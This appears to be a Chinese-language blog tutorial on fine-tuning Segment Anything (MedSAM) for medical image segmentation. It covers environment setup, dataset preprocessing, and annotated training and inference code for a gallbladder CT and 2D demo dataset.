    SAM 支持 3 中主要的分割模式:

    • 以全自动方式分割所有内容(segment everything in a fully automatic way)
      • 没有语义标签,一些分割的东西无意义
    • 边界框模式(bounding box mode)
      • 只给出左上角和右下角的点,就可以为右肾提供良好的分割结果
    • 点模式(point mode)
      • 先给一个前景点,再给一个背景点

    我们认为,在医学图像分割任务中使用 SAM 时,基于边界框的分割模式比基于分割一切和点的分割模式具有更广泛的实用价值。


    ​ 为了使 SAM 适用于医学图像分割,有必要选择适当的用户提示和网络组件进行微调。

    ​ 基于以上分析,边界框提示是指定分割目标的正确选择。SAM 的网络架构包含三个主要组件:图像编码器提示编码器掩码解码器。人们可以选择微调它们的任何组合。

    • 图像编码器基于 vision transformer,该转换器在 SAM 中具有最大的计算开销。为了降低计算成本,将图像编码器 冻结

    • 提示编码器对边界框的位置信息进行编码,并且可以从 SAM 中预先训练的边界框编码器中重复使用,冻结

    • 微调 掩码解码器

    png

    ​ 由于图像编码器可以在提示模型之前应用,因此我们可以预先计算所有训练图像的图像嵌入,以避免每次提示的图像嵌入的重复计算,这可以显著提高训练效率。掩码解码器只需要生成一个掩码,而不需要生成三个掩码,因为在大多数情况下,边界框提示可以清楚地指定预期的分割目标。


    ​ 每个数据集被随机分为80个和20个,用于训练和测试。排除了像素小于 100 的分割目标。由于 SAM 是为 2D 图像分割而设计的,我们将3D图像(即CT、MR、PET)沿平面外维度划分为2D切片。然后,我们使用预先训练的 ViT-Base 模型作为图像编码器,并通过将归一化的图像馈送到图像编码器来离线计算所有图像嵌入(图像编码器将图像大小转换为 $3\times 1024\times 1024$)。在训练期间,边界框提示是从具有0-20个像素的随机扰动的地面实况掩码生成的。损失函数是Dice损失和交叉熵损失之间的未加权和,已被证明在各种分割任务中是稳健的。Adam 优化器对网络进行了优化,初始学习率为1e-5。


    ​ 使用骰子相似系数(DSC)归一化表面距离(NSD,公差 1mm)来评估基本事实和分割结果之间的区域重叠率和边界一致性,这是两种常用的分割指标


    ​ 我们的代码和经过训练的模型是公开的,我们提供了关于在定制的新数据集上微调SAM的分步教程。我们期待着与社区合作,共同推进这一令人兴奋的研究领域。

    代码

    配置

    新建一个 conda 环境:

    1
    conda create -n medsam python=3.10 -y

    激活之:

    1
    conda activate medsam

    离线安装 pytorch:

    download.pytorch.org/whl/torch_stable.html 下载对应版本的 pytorchtorchvision

    • torch-2.0.0+cu117-cp310-cp310-win_amd64.whl
    • torchvision-0.15.1+cu117-cp310-cp310-win_amd64.whl

    png

    安装之:

    1
    pip install torch-2.0.0+cu117-cp310-cp310-win_amd64.whl -i https://pypi.tuna.tsinghua.edu.cn/simple
    1
    pip install torchvision-0.15.1+cu117-cp310-cp310-win_amd64.whl -i https://pypi.tuna.tsinghua.edu.cn/simple

    下载仓库:bowang-lab/MedSAM:MedSAM:Segment Anything in Medical Images的官方存储库。 (github.com)

    在仓库文件夹下:

    1
    pip install -e . -i https://pypi.tuna.tsinghua.edu.cn/simple

    在自定义数据集上微调 SAM

    1. 打开 pre_CT.py ,查看里面 parser 都定义了什么玩意儿:
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    # set up the parser
    parser = argparse.ArgumentParser(description='preprocess CT images')
    parser.add_argument('-i', '--nii_path', type=str, default='data/FLARE22Train/images', help='path to the nii images')
    parser.add_argument('-gt', '--gt_path', type=str, default='data/FLARE22Train/labels', help='path to the ground truth',)
    parser.add_argument('-o', '--npz_path', type=str, default='data/Npz_files', help='path to save the npz files')

    parser.add_argument('--image_size', type=int, default=256, help='image size')
    parser.add_argument('--modality', type=str, default='CT', help='modality')
    parser.add_argument('--anatomy', type=str, default='Abd-Gallbladder', help='anatomy')
    parser.add_argument('--img_name_suffix', type=str, default='_0000.nii.gz', help='image name suffix')
    parser.add_argument('--label_id', type=int, default=9, help='label id')
    parser.add_argument('--prefix', type=str, default='CT_Abd-Gallbladder_', help='prefix')
    parser.add_argument('--model_type', type=str, default='vit_b', help='model type')
    parser.add_argument('--checkpoint', type=str, default='work_dir/SAM/sam_vit_b_01ec64.pth', help='checkpoint')
    parser.add_argument('--device', type=str, default='cuda:0', help='device')
    # seed
    parser.add_argument('--seed', type=int, default=2023, help='random seed')
    args = parser.parse_args()
    参数名简称类型默认值备注
    –nii_path-istr‘data/FLARE22Train/images’path to the nii images
    –gt_path-gtstr‘data/FLARE22Train/labels’path to the ground truth
    –npz_path-ostr‘data/Npz_files’path to save the npz files
    –image_sizeint256image size
    –modalitystr‘CT’modality 形态
    –anatomystr‘Abd-Gallbladder’anatomy 解剖
    –img_name_suffixstr‘_0000.nii.gz’image name suffix 图像名称后缀
    –label_idint9label id
    –prefixstr‘CT_Abd-Gallbladder_’prefix 前缀
    –model_typestr‘vit_b’model type 模型类别
    –checkpointstr‘work_dir/SAM/sam_vit_b_01ec64.pth’checkpoint
    –devicestr‘cuda:0’device
    –seedint2023random seed 随机数种子
    1. 下载 sam_vit_b_01ec64.pth 并将其放置在 work_dir/SAM/ 中:

    png

    3D

    1. 下载 FLARE22Train.zip 并将其解压,放置在 data/ 中:

    png

    该数据集包含 50 个腹部 CT 扫描,每个扫描包含一个包含 13 个器官的注释面罩。器官标签的名称可在 MICCAI FLARE2022 上找到。 在本教程中,我们将微调 SAM 以进行胆囊 (gallbladder) 分割。

    nii.gz 是一种常见的医学影像数据格式。它是基于 NIfTI(Neuroimaging Informatics Technology Initiative)格式的一种压缩文件,通常用于存储头颅和身体的 MRI 和 CT 数据。该格式包含图像的三维体积数据,以及与图像相关的元数据信息,如图像分辨率、采集参数等。nii.gz 文件可以通过各种软件进行读取、编辑和处理,如 FSL、SPM、ANTs 等。

    1. 开跑 pre_CT.py 这只是个预处理!

      • 拆分数据集:80% 用于训练,20% 用于测试

      • 图像归一化

      • 预计算图像嵌入

      • 将归一化图像 imgs.npy、真实情况掩码 gts.npy 和图像 img_embeddings.npy 嵌入另存为文件 npz

    npy 文件是 numpy 保存单个数组的一种二进制文件格式,它可以包含一个 numpy 数组,这个数组的维度和类型等信息都可以被存储在这个文件中。npy 文件通过使用 numpy 库中的 load() 和 save() 函数进行读写。

    相比于 txt、csv 这样的文本型数据文件,npy 文件具有更好的性能和可靠性。因为文本型数据需要进行字符串转化和解析等操作,在面对大量数据时会出现读写速度较慢的情况,并且数据解析容易受到不同系统和软件的影响而出现错误。而 npy 文件采用二进制存储,可以直接将内存中的二进制数组写入文件,不需要转化和解析字符串,性能更高,同时因为没有转化字符类型,也不存在因不同系统和软件的影响而出现的数据解析错误。

    npz 是 numpy 保存数组的一种格式,它是一种压缩文件格式,可以将多个 numpy 数组打包存放在一个文件中,其压缩率较高。使用 np.savez_compressed() 函数可以生成 .npz 文件,使用 np.load() 函数可以读取 .npz 文件中的数组。相比其他文件格式(如 .txt、.csv 等),.npz 文件可以更方便地用于存储和加载大型数组数据集,因为它可以使用 numpy 库提供的高效的加载和存储方法。此外,.npz 文件还可以轻松地传递和共享数组数据集,并且不像其他文件格式那样需要手动编写 IO 操作代码来读取和写入数据。

    png

    1. 然后就可以跑 finetune_and_inference_tutorial_3D_dataset.ipynb

    2D

    1. MedSAMDemo_2D.zip - Google Drive 下载 2D 数据集,放置在 data/ 中:

    png

    png

    png

    1. 开跑 pre_grey_rgb2D.py 这只是个预处理!好在这部分用时不是很长,就拿笔记本直接跑了。

    png

    1. 获得 data\demo2D_vit_b\demo2d.npz!然后就可以跑 finetune_and_inference_tutorial_2D_dataset.ipynb

    png

    又遇俩坑,填填填:

    1
    2
    pip install chardet
    pip install --force-reinstall charset-normalizer==3.1.0

    可以跑了!

    png

    看代码

    pre_grey_rgb2D.py

    这个代码主要是对数据集进行预处理。

    set up the parser

    nametypedefaulthelp
    -i, --img_pathstrdata/MedSAMDemo_2D/train/imagespath to the images
    -gt, --gt_pathstrdata/MedSAMDemo_2D/train/labelspath to the ground truth (gt)
    -o, --npz_pathstrdata/demo2Dpath to save the npz files
    –data_namestrdemo2ddataset name; used to name the final npz file, e.g., demo2d.npz
    –image_sizeint256image size
    –img_name_suffixstr.pngimage name suffix
    –label_idint255label id
    –model_typestrvit_bmodel type
    –checkpointstrwork_dir/SAM/sam_vit_b_01ec64.pthcheckpoint
    –devicestrcuda:0device
    –seedint2023random seed
    1
    2
    3
    4
    5
    6
    7
    8
    # 获取 args.gt_path 目录下所有文件名,并按字典序排序,将结果赋值给 names
    names = sorted(os.listdir(args.gt_path))
    # 将 args.npz_path 和 args.model_type 拼接成一个新路径名 save_path
    save_path = args.npz_path + '_' + args.model_type
    # 创建新的目录save_path。如果该目录已经存在,则不做任何操作。如果不存在,则新建该目录及其所有上级目录
    os.makedirs(save_path, exist_ok=True)
    # 打印输出 names 列表的长度即图片数量
    print('image number:', len(names))

    set up the model

    1
    2
    # 初始化模型,设置好 args.model_type、args.checkpoint、args.device
    sam_model = sam_model_registry[args.model_type](checkpoint=args.checkpoint).to(args.device)

    convert 2d grey or rgb images to npz file

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    imgs = []  # 图片(images)
    gts = [] # 标签(labels)
    img_embeddings = [] # 图片嵌入信息

    # 遍历 ground truth 文件夹, names 默认为 args.gt_path('data/MedSAMDemo_2D/train/labels')下排序好的文件列表
    for gt_name in tqdm(names):
    image_name = gt_name.split('.')[0] + args.img_name_suffix # 获得文件名称 + 后缀名
    gt_data = io.imread(join(args.gt_path, gt_name)) # 获得 ground truth 数据
    if len(gt_data.shape)==3: # 如果 gt_data 是三维的,则只取第一个通道(灰度图)
    gt_data = gt_data[:,:,0]
    assert len(gt_data.shape)==2, 'ground truth should be 2D' # 确保分割标签是二维的(高和宽)
    # 这行代码的作用是将分割标签(即 gt_data)缩放到指定大小(args.image_size),并将其值转换为二进制形式(0 和 1)。
    # 具体来说,它会将分割标签中所有等于 args.label_id 的像素点设置为 1,其余像素点设置为 0,然后将结果缩放到指定大小。
    # 这里使用了 scikit-image 库的 transform.resize 函数,
    # 并指定了 order=0 表示使用最近邻插值法,
    # preserve_range=True 表示保持输入图像的范围不变(即值仍在 0 到 1 之间),
    # mode='constant' 表示在缩放后填充常数值的方式为使用边界值填充。
    # 最终得到的结果是一个二值图像,即只包含 0 和 1 两种像素值的图像。
    gt_data = transform.resize(gt_data==args.label_id, (args.image_size, args.image_size), order=0, preserve_range=True, mode='constant')
    # 将gt_data值转换为 8 位无符号整数
    gt_data = np.uint8(gt_data)

    # exclude tiny objects 如果分割标签中包含的像素点数大于 100,则执行以下操作(对源图像进行预处理,加入最终的数据集中)
    if np.sum(gt_data)>100:
    # 最大值是 1,就两种像素点。确保分割标签是二值图
    assert np.max(gt_data)==1 and np.unique(gt_data).shape[0]==2, 'ground truth should be binary'
    # 获得图像数据
    image_data = io.imread(join(args.img_path, image_name))
    # 如果图像包含透明度通道,则只取前三个通道,即 RGB 通道
    if image_data.shape[-1]>3 and len(image_data.shape)==3:
    image_data = image_data[:,:,:3]
    # 如果图像只有一个通道,则将其复制三次,即得到一个 RGB 图像
    if len(image_data.shape)==2:
    image_data = np.repeat(image_data[:,:,None], 3, axis=-1)
    # nii preprocess start
    # 计算图像的亮度范围,即确定合适的像素值下限和上限
    # 使用 np.percentile 函数分别计算了图像中像素值从小到大排列后第 0.5% 和第 99.5% 的值,
    # 将其作为下限和上限,用于后续的像素值标准化处理
    lower_bound, upper_bound = np.percentile(image_data, 0.5), np.percentile(image_data, 99.5)
    # 将图像中的像素值限制在 lower_bound 和 upper_bound 之间
    image_data_pre = np.clip(image_data, lower_bound, upper_bound)
    # 将调整后的图像进行标准化,方法是先将图像中所有像素值减去最小值,然后除以像素值范围(即最大值减去最小值),最后乘以255,使像素值缩放到0-255的范围。
    # 这样做的目的是为了使得图像不受亮度范围的影响,并且方便后续模型的处理,因为很多模型输入都需要归一化的图像数据
    image_data_pre = (image_data_pre - np.min(image_data_pre))/(np.max(image_data_pre)-np.min(image_data_pre))*255.0
    # 将背景像素(黑色)设置为 0
    image_data_pre[image_data==0] = 0
    # 调整图像大小,并使用三次样条插值方法进行重采样,使得图像更加平滑,并保持图像的范围不变
    image_data_pre = transform.resize(image_data_pre, (args.image_size, args.image_size), order=3, preserve_range=True, mode='constant', anti_aliasing=True)
    # 将图像像素值转换为 8 位无符号整数
    image_data_pre = np.uint8(image_data_pre)

    # 将处理后的图像添加到 imgs 列表中
    imgs.append(image_data_pre)
    # 确保分割标签中包含的像素点数大于100(这里为啥又问一遍?闻到了屎山的味道)
    assert np.sum(gt_data)>100, 'ground truth should have more than 100 pixels'
    # 将处理后的分割标签添加到gts列表中
    gts.append(gt_data)
    # resize image to 3*1024*1024
    # 创建一个 ResizeLongestSide 对象
    # ResizeLongestSide 的类,用于将图像和坐标进行长边缩放。
    # 具体来说,该类实现了 apply_image 和 apply_coords 两个方法,分别用于处理图像和坐标
    sam_transform = ResizeLongestSide(sam_model.image_encoder.img_size)
    # 将该 ResizeLongestSide 对象应用于 image_data_pre 图像,重新调整大小并返回新的图像 resize_img
    resize_img = sam_transform.apply_image(image_data_pre)
    # 将 numpy 数组 resize_img 转换为 PyTorch 张量,同时将其移动到 GPU
    resize_img_tensor = torch.as_tensor(resize_img.transpose(2, 0, 1)).to(args.device)
    # 对图像进行预处理,例如减去均值、除以标准差等
    input_image = sam_model.preprocess(resize_img_tensor[None,:,:,:]) # (1, 3, 1024, 1024)
    assert input_image.shape == (1, 3, sam_model.image_encoder.img_size, sam_model.image_encoder.img_size), 'input image should be resized to 1024*1024'
    # pre-compute the image embedding
    # 对输入图像进行特征提取,得到图片的 embedding
    with torch.no_grad():
    embedding = sam_model.image_encoder(input_image)
    img_embeddings.append(embedding.cpu().numpy()[0])

    save all 2D images as one npz file: ori_imgs, ori_gts, img_embeddings

    stack the list to array

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    # 将所有2D图像以及它们的相关信息(如 ground truth 和 image embedding)保存成一个 npz 文件
    if len(imgs)>1:
    imgs = np.stack(imgs, axis=0) # (n, 256, 256, 3) 表示 n 张 256x256 的 RGB 图像
    gts = np.stack(gts, axis=0) # (n, 256, 256) 表示 n 张 256x256 的灰度图像
    img_embeddings = np.stack(img_embeddings, axis=0) # (n, 1, 256, 64, 64) 将每张图像转换为了1个256x64x64的图像embedding
    # 使用np.savez_compressed函数将这三个numpy数组保存成一个npz文件,其中imgs、gts和img_embeddings分别对应三个关键字参数
    np.savez_compressed(join(save_path, args.data_name + '.npz'), imgs=imgs, gts=gts, img_embeddings=img_embeddings)
    # save an example image for sanity check 随机选择一个图像进行可视化检查
    idx = np.random.randint(imgs.shape[0]) # 随机生成一个索引 idx
    # 从 imgs、gts 和 img_embeddings 中提取出该索引对应的图像
    # img_idx、ground truth gt_idx 和 image embedding img_emb_idx
    img_idx = imgs[idx,:,:,:]
    gt_idx = gts[idx,:,:]
    # 代码使用scikit-image库的find_boundaries函数找到gt_idx中每个目标的边缘位置,并将img_idx中边缘位置的像素设为红色
    bd = segmentation.find_boundaries(gt_idx, mode='inner')
    # 将边缘设为红色
    img_idx[bd, :] = [255, 0, 0]
    # 使用io.imsave函数将处理后的img_idx保存成png文件,以便进一步进行可视化检查
    io.imsave(save_path + '.png', img_idx, check_contrast=False)

    finetune_and_inference_tutorial_2D_dataset.ipynb

    在获得预处理好的数据集后,就可以运行 finetune_and_inference_tutorial_2D_dataset.ipynb 对 SAM 模型进行 fine-tune。

    class NpzDataset(Dataset)

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    class NpzDataset(Dataset): 
    def __init__(self, data_root):
    # 读取指定目录下的所有 .npz 文件
    self.data_root = data_root
    self.npz_files = sorted(os.listdir(self.data_root))
    self.npz_data = [np.load(join(data_root, f)) for f in self.npz_files]
    # this implementation is ugly but it works (and is also fast for feeding data to GPU) if your server has enough RAM as an alternative, you can also use a list of npy files and load them one by one
    # 这个实现是丑陋的,但它可以工作(并且向 GPU 提供数据的速度也很快)如果你的服务器有足够的 RAM 作为替代方案,你也可以使用 npy 文件列表并一个一个地加载它们
    # 使用了 np.vstack() 函数对这些数组进行垂直方向上的堆叠操作
    # 将它们的 gts 和 img_embeddings 字段整合成两个 numpy 数组: ori_gts 和 img_embeddings
    self.ori_gts = np.vstack([d['gts'] for d in self.npz_data])
    self.img_embeddings = np.vstack([d['img_embeddings'] for d in self.npz_data])
    # 包含了一条有用的调试信息输出语句,输出实际读取数据文件中的 img_embeddings 和 ori_gts 的形状
    print(f"{self.img_embeddings.shape=}, {self.ori_gts.shape=}")

    def __len__(self):
    """
    这段代码定义了 __len__ 方法,该方法返回数据集的大小(即所有样本的个数),在该代码中返回的是 ori_gts 数组的第一维大小。
    由于在 NpzDataset 类初始化时,已经将所有 npz 文件中的 gts 字段整合成一个 numpy 数组 ori_gts,因此该方法返回的是所有读取文件中的目标个数(即数据集中的样本数)
    """
    return self.ori_gts.shape[0]

    def __getitem__(self, index):
    # 词嵌入向量
    img_embed = self.img_embeddings[index]
    # Ground Truth
    gt2D = self.ori_gts[index]
    # 边界框
    y_indices, x_indices = np.where(gt2D > 0)
    x_min, x_max = np.min(x_indices), np.max(x_indices)
    y_min, y_max = np.min(y_indices), np.max(y_indices)
    # add perturbation to bounding box coordinates
    # 向边界框坐标添加扰动,以实现数据增强
    H, W = gt2D.shape
    x_min = max(0, x_min - np.random.randint(0, 20))
    x_max = min(W, x_max + np.random.randint(0, 20))
    y_min = max(0, y_min - np.random.randint(0, 20))
    y_max = min(H, y_max + np.random.randint(0, 20))
    bboxes = np.array([x_min, y_min, x_max, y_max])
    # convert img embedding, mask, bounding box to torch tensor
    # 返回一个三元组:(一个图像的嵌入向量 img_embed, 对应标注的二维 Ground Truth 图 gt2D, 对应的包含目标的边界框的四个坐标 bboxes)
    return torch.tensor(img_embed).float(), torch.tensor(gt2D[None, :,:]).long(), torch.tensor(bboxes).float()

    test dataset class and dataloader

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    npz_tr_path = 'data/demo2D_vit_b'
    # 使用路径 npz_tr_path 创建了一个新的 NpzDataset 实例 demo_dataset
    demo_dataset = NpzDataset(npz_tr_path)
    # 训练开始前,代码使用 for 循环从 demo_dataloader 中依次读取一个小批量(batch)的数据,用于测试数据集和数据加载器的正确性。批大小为 8,这意味着每次迭代中将读取 8 个数据样本
    demo_dataloader = DataLoader(demo_dataset, batch_size=8, shuffle=True)
    for img_embed, gt2D, bboxes in demo_dataloader:
    # img_embed: (B, 256, 64, 64), gt2D: (B, 1, 256, 256), bboxes: (B, 4)
    # 使用 print() 函数打印了从 demo_dataloader 中读取的第一个小批量 img_embed、gt2D 和 bboxes 的形状,以确认它们是否与预期一致
    print(f"{img_embed.shape=}, {gt2D.shape=}, {bboxes.shape=}")
    # 这里程序使用 break 结束了遍历,只输出了第一个小批量的结果
    break

    set up model for fine-tuning

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    # train data path
    npz_tr_path = 'data/demo2D_vit_b' # 训练数据
    work_dir = './work_dir' # 工作目录路径
    task_name = 'demo2D' # 任务名称
    # prepare SAM model
    model_type = 'vit_b' # 模型类型
    checkpoint = 'work_dir/SAM/sam_vit_b_01ec64.pth' # 预训练模型
    device = 'cuda:0' # 设备
    model_save_path = join(work_dir, task_name) # 模型保存地址
    os.makedirs(model_save_path, exist_ok=True)
    sam_model = sam_model_registry[model_type](checkpoint=checkpoint).to(device) # 加载模型
    sam_model.train() # 设为训练模式
    # Set up the optimizer, hyperparameter tuning will improve performance here
    optimizer = torch.optim.Adam(sam_model.mask_decoder.parameters(), lr=1e-5, weight_decay=0) # 优化器
    # 代码定义了一个分割损失函数,其中采用 DiceLoss 和 CrossEntropyLoss 的结合体。
    # DiceLoss 是一个测量预测分割与真实分割偏差的指标,CrossEntropyLoss 则是针对多分类问题的损失函数,用于评估预测结果的匹配程度
    seg_loss = monai.losses.DiceCELoss(sigmoid=True, squared_pred=True, reduction='mean') # 损失函数
    1
    2
    self.img_embeddings.shape=(456, 256, 64, 64), self.ori_gts.shape=(456, 256, 256)
    img_embed.shape=torch.Size([8, 256, 64, 64]), gt2D.shape=torch.Size([8, 1, 256, 256]), bboxes.shape=torch.Size([8, 4])

    training

    原作者用的是 NVIDIA RTX A5500,配有 24 GB 显存,而我的 RTX 4060 只有 8GB 显存,emmm 只能把 batch_size 调小。我调成了 8。训练过程中显存使用量一直维持在 2GB,感觉可以再调大些?

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    num_epochs = 100  # 迭代次数
    losses = [] # 空列表,用于存放每个 epoch 的损失值
    best_loss = 1e10 # 最优损失值
    train_dataset = NpzDataset(npz_tr_path) # 读入训练数据
    # 定义数据加载器以便读取和组合数据,同时将样本分成大小为 64 的批次,并打乱顺序
    train_dataloader = DataLoader(train_dataset, batch_size=64, shuffle=True)
    for epoch in range(num_epochs):
    epoch_loss = 0
    # train
    # step 表示当前处理到了第几个批次
    # image_embedding 是嵌入图像的特征向量
    # gt2D 是训练数据的真实遮罩层标签
    # boxes 是真实的 2D 边界框
    for step, (image_embedding, gt2D, boxes) in enumerate(tqdm(train_dataloader)):
    # do not compute gradients for image encoder and prompt encoder
    # 冻结 图像编码器 和 提示编码器
    with torch.no_grad():
    # convert box to 1024x1024 grid
    # 将边界框坐标从原始坐标系转换为 1024x1024 网格坐标系
    box_np = boxes.numpy()
    # 改变大小
    sam_trans = ResizeLongestSide(sam_model.image_encoder.img_size)
    # 改变提示框大小
    box = sam_trans.apply_boxes(box_np, (gt2D.shape[-2], gt2D.shape[-1]))
    # 转换成 pytorch 张量
    box_torch = torch.as_tensor(box, dtype=torch.float, device=device)
    if len(box_torch.shape) == 2:
    """
    这段代码实现的是获取提示嵌入的过程。
    首先通过 if 语句来判断 box_torch 张量的形状是否为 (B, 4),
    其中 B 表示批次大小,4 表示边界框的坐标信息(左上角点和右下角点)。
    如果 box_torch 张量的形状是 (B, 4),则执行 if 语句中的代码进行扩维处理,
    将其转换为形状为 (B, 1, 4) 的张量。
    这么做是为了在后面的计算中保证输入张量的形状一致,从而避免出现维度不匹配的错误
    """
    box_torch = box_torch[:, None, :] # (B, 1, 4)
    # get prompt embeddings 获取提示嵌入
    sparse_embeddings, dense_embeddings = sam_model.prompt_encoder(
    points=None, # 没有用到点的信息
    boxes=box_torch, # 使用边界框来提取特征
    masks=None, # 没有使用遮罩层来进行像素级的聚合
    )
    # predicted masks 前向传播
    mask_predictions, _ = sam_model.mask_decoder(
    image_embeddings=image_embedding.to(device), # (B, 256, 64, 64)
    image_pe=sam_model.prompt_encoder.get_dense_pe(), # (1, 256, 64, 64)
    sparse_prompt_embeddings=sparse_embeddings, # (B, 2, 256)
    dense_prompt_embeddings=dense_embeddings, # (B, 256, 64, 64)
    multimask_output=False,
    )

    # 计算损失函数的值
    loss = seg_loss(mask_predictions, gt2D.to(device))
    # 反向传播
    optimizer.zero_grad()
    loss.backward()
    optimizer.step()
    # 记录损失值
    epoch_loss += loss.item()

    epoch_loss /= step
    losses.append(epoch_loss)
    print(f'EPOCH: {epoch}, Loss: {epoch_loss}')
    # save the latest model checkpoint
    torch.save(sam_model.state_dict(), join(model_save_path, 'sam_model_latest.pth')) # 最近一次 checkpoint
    # save the best model
    if epoch_loss < best_loss:
    best_loss = epoch_loss
    torch.save(sam_model.state_dict(), join(model_save_path, 'sam_model_best.pth')) # 最优 checkpoint
    1
    2
    3
    4
    5
    6
    self.img_embeddings.shape=(456, 256, 64, 64), self.ori_gts.shape=(456, 256, 256)
    100%|██████████| 57/57 [00:09<00:00, 5.95it/s]
    EPOCH: 0, Loss: 0.2000392587589366
    ……
    100%|██████████| 57/57 [00:05<00:00, 11.29it/s]
    EPOCH: 99, Loss: 0.03958414628037384

    plot loss

    1
    2
    3
    4
    5
    6
    7
    plt.plot(losses)
    plt.title('Dice + Cross Entropy Loss')
    plt.xlabel('Epoch')
    plt.ylabel('Loss')
    plt.show() # comment this line if you are running on a server
    plt.savefig(join(model_save_path, 'train_loss.png'))
    plt.close()

    如果我把 pycharm 的主题设成深色的,matplotlib 输出的图片居然也会是深色的……

    png

    load the original SAM model

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    from skimage import io
    # 加载 原始 SAM 模型 到 GPU 上
    ori_sam_model = sam_model_registry[model_type](checkpoint=checkpoint).to(device)
    # 加载 predictor
    ori_sam_predictor = SamPredictor(ori_sam_model)

    # 读入数据集
    ts_img_path = 'data/MedSAMDemo_2D/test/images'
    ts_gt_path = 'data/MedSAMDemo_2D/test/labels'
    test_names = sorted(os.listdir(ts_img_path))

    # random select a test case
    # 随机读取一张图像
    img_idx = np.random.randint(len(test_names)) # 获取索引
    image_data = io.imread(join(ts_img_path, test_names[img_idx])) # 读取
    if image_data.shape[-1]>3 and len(image_data.shape)==3: # 确保图像只有 3 个通道
    image_data = image_data[:,:,:3]
    if len(image_data.shape)==2: # 如果是单通道的灰度图像,转成 3 通道
    image_data = np.repeat(image_data[:,:,None], 3, axis=-1)
    # read ground truth (gt should have the same name as the image) and simulate a bounding box
    def get_bbox_from_mask(mask):
    '''
    Returns a bounding box from a mask
    从 ground truth 中提取出边界框坐标信息,用于对图像进行裁剪
    '''
    y_indices, x_indices = np.where(mask > 0)
    x_min, x_max = np.min(x_indices), np.max(x_indices)
    y_min, y_max = np.min(y_indices), np.max(y_indices)
    # add perturbation to bounding box coordinates
    H, W = mask.shape
    x_min = max(0, x_min - np.random.randint(0, 20))
    x_max = min(W, x_max + np.random.randint(0, 20))
    y_min = max(0, y_min - np.random.randint(0, 20))
    y_max = min(H, y_max + np.random.randint(0, 20))

    return np.array([x_min, y_min, x_max, y_max])

    # 获得 ground truth
    gt_data = io.imread(join(ts_gt_path, test_names[img_idx]))
    bbox_raw = get_bbox_from_mask(gt_data)

    # preprocess: cut-off and max-min normalization 图像预处理
    lower_bound, upper_bound = np.percentile(image_data, 0.5), np.percentile(image_data, 99.5)
    image_data_pre = np.clip(image_data, lower_bound, upper_bound)
    # 亮度范围裁剪
    image_data_pre = (image_data_pre - np.min(image_data_pre))/(np.max(image_data_pre)-np.min(image_data_pre))*255.0
    image_data_pre[image_data==0] = 0
    image_data_pre = np.uint8(image_data_pre)
    H, W, _ = image_data_pre.shape

    # predict the segmentation mask using the original SAM model
    # 开跑!
    ori_sam_predictor.set_image(image_data_pre)
    ori_sam_seg, _, _ = ori_sam_predictor.predict(point_coords=None, box=bbox_raw, multimask_output=False)

    predict the segmentation mask using the fine-tuned model

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
# resize image to 3x1024x1024
# use ResizeLongestSide() to resize the original image into a 3x1024x1024 tensor
sam_transform = ResizeLongestSide(sam_model.image_encoder.img_size)
resize_img = sam_transform.apply_image(image_data_pre)
# convert the resized image into a PyTorch tensor
resize_img_tensor = torch.as_tensor(resize_img.transpose(2, 0, 1)).to(device)
input_image = sam_model.preprocess(resize_img_tensor[None, :, :, :])  # (1, 3, 1024, 1024)
assert input_image.shape == (1, 3, sam_model.image_encoder.img_size, sam_model.image_encoder.img_size), 'input image should be resized to 1024*1024'

with torch.no_grad():
    # pre-compute the image embedding with the model's image_encoder
    ts_img_embedding = sam_model.image_encoder(input_image)
    # convert the box coordinates onto the 1024x1024 grid
    bbox = sam_transform.apply_boxes(bbox_raw, (H, W))
    print(f'{bbox_raw=} -> {bbox=}')
    box_torch = torch.as_tensor(bbox, dtype=torch.float, device=device)
    if len(box_torch.shape) == 2:
        box_torch = box_torch[:, None, :]  # (B, 4) -> (B, 1, 4)

    # compute the dense and sparse prompt embeddings with the prompt_encoder
    sparse_embeddings, dense_embeddings = sam_model.prompt_encoder(
        points=None,
        boxes=box_torch,
        masks=None,
    )
    medsam_seg_prob, _ = sam_model.mask_decoder(  # feed in the various embeddings
        image_embeddings=ts_img_embedding.to(device),  # (B, 256, 64, 64)
        image_pe=sam_model.prompt_encoder.get_dense_pe(),  # (1, 256, 64, 64)
        sparse_prompt_embeddings=sparse_embeddings,  # (B, 2, 256)
        dense_prompt_embeddings=dense_embeddings,  # (B, 256, 64, 64)
        multimask_output=False,
    )
    medsam_seg_prob = torch.sigmoid(medsam_seg_prob)  # squash to [0, 1]
    # convert soft mask to hard mask
    medsam_seg_prob = medsam_seg_prob.cpu().numpy().squeeze()
    medsam_seg = (medsam_seg_prob > 0.5).astype(np.uint8)
print(medsam_seg.shape)
